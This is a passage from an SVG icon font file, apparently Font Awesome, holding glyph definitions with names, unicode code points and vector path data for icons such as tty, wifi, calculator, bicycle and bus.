c-24.8887 34.2158 -60.0039 60.0889 -100.709 73.1406l13.6514 -31.9385l-74.9531 -41.5264l-74.9531 41.5254l13.6514 31.9385c-40.6309 -13.0283 -75.7803 -38.8701 -100.709 -73.1406l34.5645 3.07324l16.1924 -84.3555l-62.6777 -58.5l-26.0645 22.7412
l-0.00292969 -0.282227c0 -43.0146 13.4971 -83.9521 38.4717 -117.991l7.7041 33.8975l85.1387 -10.4473l36.3008 -77.8262l-29.9023 -17.7861c40.2021 -13.1221 84.29 -13.1475 124.572 0l-29.9023 17.7861l36.3008 77.8262l85.1387 10.4473l7.7041 -33.8975
c24.9756 34.0391 38.4727 74.9766 38.4727 117.991zM207.898 122.429l-29.8945 91.3125l77.9961 56.5264l77.9961 -56.5264l-29.6221 -91.3125h-96.4756z" />
    <glyph glyph-name="tty" unicode="&#xf1e4;" 
d="M5.37012 344.178c138.532 138.532 362.936 138.326 501.262 0c6.07812 -6.07812 7.07422 -15.4961 2.58301 -22.6807l-43.2139 -69.1377c-2.97266 -4.75684 -9.9375 -8.61719 -15.5459 -8.61719c-1.94922 0 -5 0.587891 -6.81055 1.31152l-86.4219 34.5693
c-6.36133 2.54492 -11.5244 10.1719 -11.5244 17.0234c0 0.503906 0.0410156 1.32031 0.0908203 1.82227l5.95215 59.5312c-62.1455 22.4541 -130.636 21.9863 -191.483 0l5.95312 -59.5322c0.0507812 -0.501953 0.0908203 -1.32031 0.0908203 -1.8252
c0 -6.85156 -5.16309 -14.4766 -11.5244 -17.0205l-86.4238 -34.5684c-1.80957 -0.723633 -4.85938 -1.31152 -6.80859 -1.31152c-5.60938 0 -12.5742 3.86035 -15.5469 8.61719l-43.2109 69.1387c-1.53809 2.46094 -2.78711 6.81445 -2.78711 9.7168
c0 4.19141 2.40625 9.99902 5.37012 12.9629zM96 140c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM192 140c0 -6.62695 -5.37305 -12 -12 -12h-40
c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM288 140c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM384 140
c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM480 140c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40
c6.62695 0 12 -5.37305 12 -12v-40zM144 44c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM240 44c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40
c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM336 44c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM432 44c0 -6.62695 -5.37305 -12 -12 -12h-40
c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM96 -52c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40zM384 -52
c0 -6.62695 -5.37305 -12 -12 -12h-232c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h232c6.62695 0 12 -5.37305 12 -12v-40zM480 -52c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40
c6.62695 0 12 -5.37305 12 -12v-40z" />
    <glyph glyph-name="binoculars" unicode="&#xf1e5;" 
d="M416 400v-48h-96v48c0 8.83984 7.16016 16 16 16h64c8.83984 0 16 -7.16016 16 -16zM63.9102 288.01c0.479492 17.6201 14.2998 31.9902 31.9297 31.9902h96.1602v-160h-32v-160c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v44
c3.45996 129.78 61.4004 150.16 63.9102 244.01zM448.09 288.01c2.50977 -93.8496 60.4502 -114.229 63.9102 -244.01v-44c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v160h-32v160h96.1602c17.6299 0 31.4502 -14.3701 31.9297 -31.9902zM176 416
c8.83984 0 16 -7.16016 16 -16v-48h-96v48c0 8.83984 7.16016 16 16 16h64zM224 160v160h64v-160h-64z" />
    <glyph glyph-name="plug" unicode="&#xf1e6;" horiz-adv-x="384" 
d="M256 304v112c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-112h-64zM368 288c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-16v-32c0 -77.4062 -54.9688 -141.971 -128 -156.796v-99.2041h-64v99.2041
c-73.0312 14.8252 -128 79.3896 -128 156.796v32h-16c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h352zM128 304h-64v112c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-112z" />
    <glyph glyph-name="newspaper" unicode="&#xf1ea;" horiz-adv-x="576" 
d="M552 384c13.2549 0 24 -10.7451 24 -24v-312c0 -26.5098 -21.4902 -48 -48 -48h-472c-30.9277 0 -56 25.0723 -56 56v272c0 13.2549 10.7451 24 24 24h40v8c0 13.2549 10.7451 24 24 24h464zM56 48c4.41602 0 8 3.58398 8 8v248h-16v-248c0 -4.41602 3.58398 -8 8 -8z
M292 64c6.62695 0 12 5.37305 12 12v8c0 6.62695 -5.37305 12 -12 12h-152c-6.62695 0 -12 -5.37305 -12 -12v-8c0 -6.62695 5.37305 -12 12 -12h152zM500 64c6.62695 0 12 5.37305 12 12v8c0 6.62695 -5.37305 12 -12 12h-152c-6.62695 0 -12 -5.37305 -12 -12v-8
c0 -6.62695 5.37305 -12 12 -12h152zM292 160c6.62695 0 12 5.37305 12 12v8c0 6.62695 -5.37305 12 -12 12h-152c-6.62695 0 -12 -5.37305 -12 -12v-8c0 -6.62695 5.37305 -12 12 -12h152zM500 160c6.62695 0 12 5.37305 12 12v8c0 6.62695 -5.37305 12 -12 12h-152
c-6.62695 0 -12 -5.37305 -12 -12v-8c0 -6.62695 5.37305 -12 12 -12h152zM500 256c6.62695 0 12 5.37305 12 12v40c0 6.62695 -5.37305 12 -12 12h-360c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h360z" />
    <glyph glyph-name="wifi" unicode="&#xf1eb;" horiz-adv-x="640" 
d="M634.91 293.12c6.66016 -6.16016 6.79004 -16.5898 0.359375 -22.9805l-34.2393 -33.9697c-6.14062 -6.08984 -16.0205 -6.22949 -22.4004 -0.379883c-145.95 133.71 -371.33 133.68 -517.25 0c-6.37988 -5.84961 -16.2598 -5.71973 -22.3994 0.379883l-34.2402 33.9697
c-6.44043 6.39062 -6.31055 16.8203 0.349609 22.9805c177.101 163.81 452.65 163.87 629.82 0zM320 96c35.3496 0 64 -28.6504 64 -64s-28.6504 -64 -64 -64s-64 28.6504 -64 64s28.6504 64 64 64zM522.67 179.59c6.88965 -6.08984 7.12012 -16.6895 0.560547 -23.1494
l-34.4404 -33.9902c-6 -5.93066 -15.6602 -6.32031 -22.0498 -0.799805c-83.75 72.4092 -209.54 72.5693 -293.49 0c-6.38965 -5.52051 -16.0498 -5.12012 -22.0498 0.799805l-34.4404 33.9902c-6.5498 6.45996 -6.33008 17.0498 0.570312 23.1494
c115.13 101.82 290.08 101.93 405.34 0z" />
    <glyph glyph-name="calculator" unicode="&#xf1ec;" horiz-adv-x="448" 
d="M400 448c25.5996 0 48 -22.4004 48 -48v-416c0 -25.5996 -22.4004 -48 -48 -48h-352c-25.5996 0 -48 22.4004 -48 48v416c0 25.5996 22.4004 48 48 48h352zM128 12.7998v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM128 140.8v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM256 12.7998v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM256 140.8v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM384 12.7998v166.4c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-166.4c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM384 268.8v102.4c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-294.4
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-102.4c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h294.4c6.39941 0 12.7998 6.40039 12.7998 12.7998z" />
    <glyph glyph-name="bell-slash" unicode="&#xf1f6;" horiz-adv-x="640" 
d="M633.82 -10.0996c6.97949 -5.43066 8.22949 -15.4805 2.80957 -22.4502l-19.6396 -25.2705c-5.43066 -6.97949 -15.4805 -8.23926 -22.46 -2.80957l-588.351 454.729c-6.97949 5.43066 -8.22949 15.4805 -2.80957 22.4502l19.6396 25.2705
c5.41992 6.97949 15.4805 8.22949 22.46 2.80957l144.96 -112.04c22.9307 31.5 57.2607 54.1904 97.5898 62.5703v20.8398c0 17.6699 14.3203 32 31.9805 32s31.9805 -14.3301 31.9805 -32v-20.8301c73.46 -15.2598 127.939 -77.46 127.939 -155.16
c0 -102.3 36.1504 -133.529 55.4697 -154.29c6 -6.43945 8.66016 -14.1602 8.61035 -21.71c0 -1.39941 -0.610352 -2.67969 -0.799805 -4.05957zM157.23 196.46l212.789 -164.46h-241.92c-19.1191 0 -31.9893 15.5996 -32.0996 32
c-0.0498047 7.5498 2.61035 15.2598 8.61035 21.71c16.21 17.4199 44.0098 42.79 52.6201 110.75zM320 -64c-35.3203 0 -63.9697 28.6504 -63.9697 64h127.939c0 -35.3496 -28.6494 -64 -63.9697 -64z" />
    <glyph glyph-name="trash" unicode="&#xf1f8;" horiz-adv-x="448" 
d="M432 416c8.83203 0 16 -7.16797 16 -16v-32c0 -8.83203 -7.16797 -16 -16 -16h-416c-8.83203 0 -16 7.16797 -16 16v32c0 8.83203 7.16797 16 16 16h120l9.40039 18.7002c3.58984 7.3418 13.1357 13.2998 21.3086 13.2998h0.0908203h114.3h0.0175781
c8.20215 0 17.8262 -5.95801 21.4824 -13.2998l9.40039 -18.7002h120zM53.2002 -19l-21.2002 339h384l-21.2002 -339c-1.55469 -24.8369 -23.0146 -44.9971 -47.8994 -45h-245.801c-24.8848 0.00292969 -46.3447 20.1631 -47.8994 45z" />
    <glyph glyph-name="copyright" unicode="&#xf1f9;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM373.134 93.2471c1.58203 1.85645 2.86621 5.34375 2.86621 7.7832c0 2.16309 -1.03613 5.33594 -2.31348 7.08301l-24.5469 33.5713
c-4.44824 6.08691 -13.376 6.61816 -18.5078 1.05371c-0.263672 -0.287109 -26.8467 -28.625 -65.5439 -28.625c-48.7627 0 -74.2773 40.0898 -74.2773 79.6914c0 42.5068 27.8008 76.082 73.916 76.082c35.3516 0 61.6475 -23.666 61.8809 -23.8799
c5.45996 -5.05566 14.1846 -3.97168 18.2334 2.29492l22.3799 34.6553c1.05957 1.64062 1.91992 4.55762 1.91992 6.51074c0 2.57812 -1.41504 6.21191 -3.15723 8.1123c-1.45703 1.58887 -36.4658 38.9043 -103.423 38.9043
c-81.7578 0 -143.762 -62.0986 -143.762 -143.401c0 -82.3066 59.792 -145.567 144.484 -145.567c70.0752 0 108.259 43.8643 109.851 45.7314z" />
    <glyph glyph-name="at" unicode="&#xf1fa;" 
d="M256 440c138.023 0 248 -87.6533 248 -224c0 -75.7979 -41.3906 -147.41 -150.299 -147.41c-30.0977 0 -61.1885 -0.000976562 -70.71 34.1035c-17.6221 -22.6963 -48.0068 -38.333 -74.9912 -38.333c-59.2148 0 -96 40.5664 -96 105.87
c0 89.2256 63.251 151.46 137.831 151.46c19.5225 0 45.2744 -3.87402 59.9707 -21.7754l0.00976562 0.0917969c0.751953 6.62012 6.76953 11.9932 13.4326 11.9932v0h44.9805c15.083 0 26.4287 -13.75 23.5625 -28.5586l-23.4336 -121.11
c-3.43359 -17.167 -3.87207 -29.5703 13.4766 -30.0244c37.0771 3.95117 58.1699 44.9072 58.1699 83.6934c0 102.381 -83.8613 160 -184 160c-101.458 0 -184 -82.542 -184 -184s82.542 -184 184 -184c35.3145 0 69.9199 10.2432 99.4102 29.1572
c10.1934 6.53809 23.7021 4.24219 31.373 -5.12891l10.1768 -12.4336c9.07324 -11.084 6.45312 -27.5566 -5.55176 -35.3721c-40.0664 -26.083 -87.2539 -40.2227 -135.408 -40.2227c-137.081 0 -248 110.941 -248 248c0 137.081 110.941 248 248 248zM234.32 135.57
c24.2861 0 58.1611 27.6689 58.1611 72.7295c0 25.5293 -13.3096 40.7705 -35.6016 40.7705c-27.8506 0 -58.6299 -27.7363 -58.6299 -72.7295c0 -25.1475 13.8213 -40.7705 36.0703 -40.7705z" />
    <glyph glyph-name="eye-dropper" unicode="&#xf1fb;" 
d="M50.75 114.75l126.63 126.61l128 -128l-126.64 -126.62c-12 -12 -28.2803 -18.7402 -45.25 -18.7402h-45.4902l-56 -32l-32 32l32 56v45.4902c0 16.9795 6.75 33.2598 18.75 45.2598zM483.88 419.88c37.5 -37.4902 37.5 -98.2695 -0.00976562 -135.75l-77.0898 -77.0898
l13.0996 -13.0996c9.37012 -9.37012 9.37012 -24.5703 0 -33.9404l-40.9697 -40.96c-9.29004 -9.30957 -24.5 -9.44043 -33.9404 0l-161.939 161.94c-9.37012 9.36914 -9.37012 24.5693 0 33.9395l40.9697 40.9697c9.29004 9.31055 24.5 9.44043 33.9404 0l13.0996 -13.0996
l77.0898 77.0898c37.4697 37.5 98.2803 37.5 135.75 0z" />
    <glyph glyph-name="paint-brush" unicode="&#xf1fc;" 
d="M167.02 138.66l88.0107 -73.3398c0.319336 -3.05078 0.969727 -6.02051 0.969727 -9.12988c0 -76.4209 -52.1396 -120.19 -128 -120.19c-90.0703 0 -128 72.3799 -128.01 154.73c9.79004 -6.68066 44.1396 -34.3506 55.25 -34.3506
c6.58984 0 12.2402 3.77051 14.5898 9.98047c20.6602 54.4395 57.0703 69.7197 97.1895 72.2998zM457.89 448c28.1104 0 54.1104 -20.6396 54.1104 -49.5498c0 -16.1406 -6.51953 -31.6406 -13.9004 -45.9902c-113.05 -210.99 -149.05 -256.46 -211.159 -256.46
c-7.75 0 -15.1807 1.23047 -22.3906 3.03027l-63.8193 53.1797c-5.48047 11.9404 -8.73047 25 -8.73047 38.7002c0 53.75 21.2695 58.04 225.68 240.64c10.8398 9.74023 25.0508 16.4502 40.21 16.4502z" />
    <glyph glyph-name="birthday-cake" unicode="&#xf1fd;" horiz-adv-x="448" 
d="M448 64c-28.0195 0 -31.2598 32 -74.5 32c-43.4297 0 -46.8252 -32 -74.75 -32c-27.6953 0 -31.4541 32 -74.75 32c-42.8418 0 -47.2178 -32 -74.5 -32c-28.1484 0 -31.2021 32 -74.75 32c-43.5469 0 -46.6533 -32 -74.75 -32v80c0 26.5 21.5 48 48 48h16v144h64v-144h64
v144h64v-144h64v144h64v-144h16c26.5 0 48 -21.5 48 -48v-80zM448 -64h-448v96c43.3564 0 46.7666 32 74.75 32c27.9512 0 31.2529 -32 74.75 -32c42.8428 0 47.2168 32 74.5 32c28.1484 0 31.2012 -32 74.75 -32c43.3574 0 46.7666 32 74.75 32
c27.4883 0 31.252 -32 74.5 -32v-96zM96 352c-17.75 0 -32 14.25 -32 32c0 31 32 23 32 64c12 0 32 -29.5 32 -56s-14.25 -40 -32 -40zM224 352c-17.75 0 -32 14.25 -32 32c0 31 32 23 32 64c12 0 32 -29.5 32 -56s-14.25 -40 -32 -40zM352 352c-17.75 0 -32 14.25 -32 32
c0 31 32 23 32 64c12 0 32 -29.5 32 -56s-14.25 -40 -32 -40z" />
    <glyph glyph-name="chart-area" unicode="&#xf1fe;" 
d="M500 64c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-488c-6.59961 0 -12 5.40039 -12 12v360c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-308h436zM372.7 288.5c6 4 14.2002 1.7998 17.3994 -4.7002l89.9004 -187.8h-384v104
l86.7998 144.7c4.40039 7.2998 14.7998 7.7998 19.9004 1l85.2998 -113.7z" />
    <glyph glyph-name="chart-pie" unicode="&#xf200;" horiz-adv-x="544" 
d="M527.79 160c9.5498 0 17.4004 -8.38965 16.0596 -17.8496c-7.80957 -55.25 -34.4297 -104.4 -73.1299 -140.86c-6.20996 -5.84961 -16.1494 -5.36035 -22.1895 0.679688l-158.03 158.03h237.29zM511.96 224.8c0.629883 -9.12012 -7.0498 -16.7998 -16.1904 -16.7998
h-223.77v223.76c0 9.14062 7.67969 16.8301 16.7998 16.2002c119.46 -8.24023 214.92 -103.7 223.16 -223.16zM224 160l155.86 -155.87c6.84961 -6.84961 6.33008 -18.4795 -1.57031 -24.0801c-38.29 -27.1602 -84.8604 -43.3994 -135.26 -44.0303
c-128.2 -1.60938 -238.53 103.471 -242.891 231.61c-4.23926 124.771 86.8506 228.88 206.021 245.72c9.4502 1.34082 17.8398 -6.50977 17.8398 -16.0596v-237.29z" />
    <glyph glyph-name="chart-line" unicode="&#xf201;" 
d="M496 64c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-464c-17.6699 0 -32 14.3301 -32 32v336c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-304h432zM464 352c8.83984 0 16 -7.16016 15.9902 -16v-118.05
c0 -21.3799 -25.8506 -32.0898 -40.9707 -16.9697l-32.3994 32.3994l-96 -96c-12.4902 -12.5 -32.75 -12.5 -45.25 0l-73.3701 73.3701l-46.0596 -46.0703c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-22.6191 22.6201c-6.25 6.25 -6.25 16.3799 0 22.6299l68.6895 68.6904
c12.4902 12.5 32.75 12.5 45.25 0l73.3701 -73.3701l73.3701 73.3799l-32.4004 32.4004c-15.1201 15.1201 -4.41016 40.9697 16.9707 40.9697h118.06z" />
    <glyph glyph-name="toggle-off" unicode="&#xf204;" horiz-adv-x="576" 
d="M384 384c106.039 0 192 -85.9609 192 -192s-85.9609 -192 -192 -192h-192c-106.039 0 -192 85.9609 -192 192s85.9609 192 192 192h192zM64 192c0 -70.751 57.2588 -128 128 -128c70.751 0 128 57.2588 128 128c0 70.751 -57.2588 128 -128 128
c-70.751 0 -128 -57.2588 -128 -128zM384 64c70.751 0 128 57.2598 128 128c0 70.751 -57.2588 128 -128 128h-48.9053c65.2363 -72.8799 65.2168 -183.142 0 -256h48.9053z" />
    <glyph glyph-name="toggle-on" unicode="&#xf205;" horiz-adv-x="576" 
d="M384 384c106 0 192 -86 192 -192s-86 -192 -192 -192h-192c-106 0 -192 86 -192 192s86 192 192 192h192zM384 64c70.7002 0 128 57.2002 128 128c0 70.7002 -57.2002 128 -128 128c-70.7002 0 -128 -57.2002 -128 -128c0 -70.7002 57.2002 -128 128 -128z" />
    <glyph glyph-name="bicycle" unicode="&#xf206;" horiz-adv-x="640" 
d="M512.509 255.999c70.9502 -0.276367 128.562 -59.0547 127.477 -129.996c-1.07422 -70.1934 -58.6494 -126.681 -129.255 -125.996c-68.8301 0.667969 -126.584 58.8857 -126.729 127.719c-0.078125 37.3564 15.8516 70.9893 41.3066 94.4375l-14.9375 24.0674
l-85.9619 -138.863c-3.88477 -6.27441 -13.0264 -11.3672 -20.4062 -11.3672h-52.0332c-14.209 -55.207 -64.3252 -96 -123.967 -96c-70.9473 0 -128.415 57.7207 -128 128.764c0.410156 70.2246 58.0918 127.406 128.317 127.236
c15.0879 -0.0371094 29.5586 -2.69043 42.9912 -7.51953l29.417 47.5195h-48.7256c-13.1191 0 -23.7627 10.5186 -23.9951 23.5635c-0.241211 13.4375 11.0947 24.4365 24.5361 24.4365h87.459c8.83691 0 16 -7.16309 16 -16v-16h113.544l-14.8955 24h-50.6494
c-8.83691 0 -16 7.16309 -16 16v16c0 8.83691 7.16309 16 16 16h64h0.000976562c7.36914 0 16.5049 -5.08203 20.3906 -11.3428l77.6807 -125.153c14.4053 5.54004 30.0625 8.55957 46.4355 8.49512zM186.75 182.228l-23.6641 -38.2275h43.3057
c-2.96875 14.5674 -9.91504 27.6992 -19.6416 38.2275zM128.002 48c32.7383 0 60.9297 19.7754 73.2998 48h-81.2998c-18.7891 0 -30.2871 20.6729 -20.4062 36.6318l45.5049 73.5088c-5.5127 1.20605 -11.2295 1.85938 -17.0986 1.85938c-44.1123 0 -80 -35.8877 -80 -80
s35.8877 -80 80 -80zM290.632 144l74.2861 120h-127.547l-24.7461 -39.9736c22.8271 -20.1328 38.4229 -48.2705 42.3828 -80.0264h35.624zM507.689 48.1143c46.0605 -2.43164 84.3115 34.3447 84.3125 79.8848c0 44.1123 -35.8877 80 -80 80h-0.0390625
c-5.55664 0 -14.4355 -1.11914 -19.8193 -2.49707l44.4688 -71.6426c4.66113 -7.50879 2.35156 -17.3721 -5.15625 -22.0322l-13.5938 -8.4375c-7.50879 -4.65918 -17.3721 -2.35156 -22.0322 5.15625l-44.4326 71.5859
c-12.7021 -14.7451 -20.1475 -34.1416 -19.3359 -55.2627c1.57812 -41.0635 34.5918 -74.5898 75.6279 -76.7549z" />
    <glyph glyph-name="bus" unicode="&#xf207;" 
d="M488 320c13.25 0 24 -10.7402 24 -24v-80c0 -13.25 -10.75 -24 -24 -24h-8v-166.4c0 -12.7998 -9.59961 -25.5996 -25.5996 -25.5996h-6.40039v-32c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v32h-192v-32c0 -17.6699 -14.3301 -32 -32 -32h-32
c-17.6699 0 -32 14.3301 -32 32v32c-17.6699 0 -32 14.3301 -32 32v160h-8c-13.25 0 -24 10.75 -24 24v80c0 13.2598 10.75 24 24 24h8v48c0 44.7998 99.2002 80 224 80s224 -35.2002 224 -80v-48h8zM112 48c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM128 160h256c17.6699 0 32 14.3301 32 32v128c0 17.6699 -14.3301 32 -32 32h-256c-17.6699 0 -32 -14.3301 -32 -32v-128c0 -17.6699 14.3301 -32 32 -32zM400 48c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="closed-captioning" unicode="&#xf20a;" 
d="M464 384c26.5 0 48 -21.5 48 -48v-288c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h416zM218.1 160.3c-41.1992 -37.8994 -92.1992 -15.3994 -92.2998 32.6006c0 46.0996 53.7998 63.1992 94.6006 31.1992
c2.89941 -2.2998 7.19922 -1.39941 9.09961 1.7002l17.5 30.5c1.5 2.5 1.09961 3.7002 -1 5.7002c-50.7998 49.4004 -172.5 27.2002 -172.5 -70.0996c0 -100 119.2 -124.7 172.8 -67.9004c2 2.09961 2.2002 5.2998 0.5 7.7002l-19.5 27.7002
c-2.09961 3 -6.39941 3.39941 -9.2002 0.899414zM408.5 160.3c-41.2002 -37.8994 -92.2002 -15.3994 -92.2002 32.6006c0 46.0996 53.7998 63.1992 94.6006 31.1992c2.89941 -2.2998 7.19922 -1.39941 9.09961 1.7002l17.5 30.5c1.5 2.5 1.09961 3.7002 -1 5.7002
c-50.7998 49.4004 -172.5 27.2002 -172.5 -70.0996c0 -100 119.2 -124.801 172.7 -67.9004c2 2.09961 2.2002 5.2998 0.5 7.7002l-19.5 27.7002c-2.10059 3 -6.40039 3.39941 -9.2002 0.899414z" />
    <glyph glyph-name="shekel-sign" unicode="&#xf20b;" horiz-adv-x="448" 
d="M248 280c0 30.9297 -25.0703 56 -56 56h-112v-352c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16v408c0 13.2598 10.75 24 24 24h168c75.1104 0 136 -60.8896 136 -136v-168c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16
v168zM432 416c8.83984 0 16 -7.16016 16 -16v-296c0 -75.1104 -60.8896 -136 -136 -136h-168c-13.25 0 -24 10.75 -24 24v280c0 8.83984 7.16016 16 16 16h48c8.83984 0 16 -7.16016 16 -16v-224h112c30.9297 0 56 25.0703 56 56v296c0 8.83984 7.16016 16 16 16h48z" />
    <glyph glyph-name="cart-plus" unicode="&#xf217;" horiz-adv-x="575" 
d="M504.717 128h-293.145l6.54492 -32h268.418c15.4004 0 26.8154 -14.3008 23.4033 -29.3193l-5.51758 -24.2754c18.6914 -9.07324 31.5791 -28.2334 31.5791 -50.4053c0 -31.2021 -25.5186 -56.4443 -56.8242 -55.9941
c-29.8232 0.428711 -54.3496 24.6309 -55.1543 54.4473c-0.44043 16.2871 6.08496 31.0488 16.8027 41.5479h-209.648c10.377 -10.166 16.8242 -24.3271 16.8242 -40.001c0 -31.8135 -26.5283 -57.4307 -58.6699 -55.9385c-28.54 1.3252 -51.751 24.3857 -53.251 52.917
c-1.1582 22.0342 10.4355 41.4551 28.0508 51.5869l-70.2471 343.435h-69.8828c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h102.529c11.4004 0 21.2275 -8.02148 23.5127 -19.1904l9.16602 -44.8096h392.782
c15.4004 0 26.8154 -14.3008 23.4023 -29.3193l-47.2725 -208c-2.4834 -10.9268 -12.1973 -18.6807 -23.4033 -18.6807zM408 280h-48v40c0 8.83691 -7.16309 16 -16 16h-16c-8.83691 0 -16 -7.16309 -16 -16v-40h-48c-8.83691 0 -16 -7.16309 -16 -16v-16
c0 -8.83691 7.16309 -16 16 -16h48v-40c0 -8.83691 7.16309 -16 16 -16h16c8.83691 0 16 7.16309 16 16v40h48c8.83691 0 16 7.16309 16 16v16c0 8.83691 -7.16309 16 -16 16z" />
    <glyph glyph-name="cart-arrow-down" unicode="&#xf218;" horiz-adv-x="575" 
d="M504.717 128h-293.145l6.54492 -32h268.418c15.4004 0 26.8154 -14.3008 23.4033 -29.3193l-5.51758 -24.2754c18.6914 -9.07324 31.5791 -28.2334 31.5791 -50.4053c0 -31.2021 -25.5186 -56.4443 -56.8242 -55.9941
c-29.8232 0.428711 -54.3496 24.6309 -55.1543 54.4473c-0.44043 16.2871 6.08496 31.0488 16.8027 41.5479h-209.648c10.377 -10.166 16.8242 -24.3271 16.8242 -40.001c0 -31.8135 -26.5283 -57.4307 -58.6699 -55.9385c-28.54 1.3252 -51.751 24.3857 -53.251 52.917
c-1.1582 22.0342 10.4355 41.4551 28.0508 51.5869l-70.2471 343.435h-69.8828c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h102.529c11.4004 0 21.2275 -8.02148 23.5127 -19.1904l9.16602 -44.8096h392.782
c15.4004 0 26.8154 -14.3008 23.4023 -29.3193l-47.2725 -208c-2.4834 -10.9268 -12.1973 -18.6807 -23.4033 -18.6807zM403.029 256h-43.0293v60c0 6.62695 -5.37305 12 -12 12h-24c-6.62695 0 -12 -5.37305 -12 -12v-60h-43.0293
c-10.6904 0 -16.0449 -12.9258 -8.48438 -20.4854l67.0283 -67.0283c4.68652 -4.68652 12.2842 -4.68652 16.9717 0l67.0283 67.0283c7.55957 7.55957 2.20508 20.4854 -8.48535 20.4854z" />
    <glyph glyph-name="ship" unicode="&#xf21a;" horiz-adv-x="640" 
d="M496.616 75.3613c17.8418 -44.3604 58.5664 -75.3613 119.384 -75.3613c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24c-61.0322 0 -107.505 20.6162 -143.258 59.3965c-14.4189 -34.8281 -48.7637 -59.3965 -88.7422 -59.3965h-128
c-39.9785 0 -74.3232 24.5684 -88.7422 59.3965c-35.7588 -38.7861 -82.2344 -59.3965 -143.258 -59.3965c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24c61.5869 0 101.828 31.7129 119.384 75.3613l-70.0117 70.0117
